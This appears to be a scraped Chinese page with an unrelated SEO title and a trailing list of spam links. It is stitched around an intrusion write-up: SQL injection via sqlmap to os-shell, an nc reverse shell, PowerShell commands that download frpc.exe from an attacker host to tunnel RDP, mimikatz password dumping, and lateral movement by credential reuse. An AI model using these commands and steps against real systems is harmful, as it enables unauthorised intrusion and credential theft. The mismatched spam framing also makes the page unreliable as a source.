当前位置: 首页 > news >正文

网站logo也叫做网站的郑州seo课程

网站logo也叫做网站的,郑州seo课程,如何做区块链网站,网站中的滚动照片怎么做一、漏洞发现 拿到登录的接口,丢到sqlmap里面跑一把,发现延时注入 进一步查询,发现是sa权限,直接os-shell whomai查询发现是管理员权限 os-shell执行命令太慢了,直接进行nc 反弹 执行base64 加密后的powershell命令&…

一、漏洞发现
拿到登录的接口,丢到sqlmap里面跑一把,发现延时注入
在这里插入图片描述
进一步查询,发现是sa权限,直接os-shell whomai查询发现是管理员权限
在这里插入图片描述
os-shell执行命令太慢了,直接进行nc 反弹
执行base64 加密后的powershell命令,反弹回shell
在这里插入图片描述
nc shell下加账号和密码成功,mstsc远程连接发现失败
初步判断应该是在内网
配置好frpc.exe 和frpc.ini 将其下载到目标服务器
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.ini’,‘frpc.ini’)
powershell (new-object System.Net.WebClient).DownloadFile(‘http://ip:8888/frpc.exe’,‘frpc.exe’)
./frpc.exe
在frp管理页面看到目标端口已经上线
在这里插入图片描述
接下来进行mstsc远程连接
在这里插入图片描述
使用mimikatz 抓取其密码,直接报出明文
在这里插入图片描述
通过arp -a 发现其内网中还有一个活跃的服务器
在这里插入图片描述
直接在目标机上用爆出来的密码尝试远程登录,成功登录
在这里插入图片描述

二、总结一下思路
1 、找到sql注入,且是sa
2 、通过os-shell 反弹一个nc更容易执行命令
3 、发现是管理员权限,直接加账号,如果不上,可以考虑通过msf 或是cs去提权
4 、查询发现3389端口是开的,但是连接不上,考虑可能是在内网
5 、尝试通过frp或者其他工具将其3389端口转发出来,再进行连接
6 、登录成功后抓取用户名密码
7 、通过arp 查询相关的内网中的通信和路由
8 、尝试通过6爆出来的账号密码去碰撞其他内网机器

http://www.tj-hxxt.cn/news/27186.html

相关文章:

  • 石牌桥网站建设企业网站建设的目的
  • 全站flash网站神马网站快速排名软件
  • 备案的网站换空间厦门网站到首页排名
  • 自己建网站怎么做seo网络营销策划书怎么写
  • 东华网站开发北京朝阳区优化
  • 直播类网站开发营销策划案的模板
  • 中国农村建设网站广告优化师前景怎样
  • 在线做交互网站整站外包优化公司
  • 电子商务网站建设教学星沙网站优化seo
  • 转运公司网站建设国内做seo最好的公司
  • 哪个网站可以悬赏做图什么是营销型网站?
  • 现在的网站开发用什么技术网站制作app免费软件
  • 制作小程序营销平台seo网站优化师
  • 沧州省建设厅网站网络营销八大目标是什么
  • 招远专业做网站公司平台交易网
  • 动漫制作专业可以考公务员吗seo网站优化外包
  • 重庆疫情最新消息今天优化营商环境存在问题及整改措施
  • 怎么通过局域网建设网站品牌网络推广运营公司
  • 内衣网站建立站长工具下载app
  • 手机wap网站如何建设济南网站制作公司
  • 中小企业网站建设精准营销
  • 重庆网站建设设计广西壮族自治区
  • 深圳做自适应网站设计谷歌官方网站首页
  • 企业建网站有这个必要吗mac蜜桃923色号
  • 学做网站需要懂什么流量点击推广平台
  • 广饶网站设计百度推广电话销售好做吗
  • 铝木门窗网站建设怎么自己注册网站平台了
  • 网站维护工程师月薪多少西安百度关键词排名服务
  • 上海网站制作建设怎么样seo排名优化seo
  • 北京高端网页制作自动优化句子的软件